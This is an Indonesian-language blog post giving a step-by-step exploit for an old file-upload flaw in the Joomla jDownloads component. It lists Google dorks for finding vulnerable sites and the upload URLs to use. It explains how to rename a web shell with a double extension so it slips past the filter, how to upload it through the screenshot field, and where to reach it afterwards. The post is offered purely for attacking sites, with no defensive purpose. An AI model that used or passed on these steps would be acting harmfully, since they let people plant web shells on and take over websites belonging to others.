Sebenarnya POC ini sudah lama,
Tapi aku bikin artikel lagi bagi yang belom tau, buat melengkapi postingan blog ini juga, siapa tau entar berguna.
Baca juga: Scanner JDownloads Vulnerability [ Perl ]
Skip.
Dork:
Powered by jDownloads
/index.php?option=com_jdownloads
inurl:/index.php?option=com_jdownloads intext:Powered by jDownloads
Kembangin lagi sendiri
Pastekan di google pencarian,
buka 1 per 1 tambahkan explot:
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload
Contoh:
http://www.target.com/index.php?option=com_jdownloads&Itemid=1&view=upload
Lalu isi data-data yang perlu, yang ada tanda merah di depan kotak isian,
Rename dulu shell mu sebelum di upload jadi shell.php.php.j
Lalu upload di bagian screenshort, Nanti shell otomatis berubah jadi shell.php.j
Acces shell kalian di:
http://www.target.com/images/jdownloads/screenshots/shell.php.j
Sekian :p
0 Komentar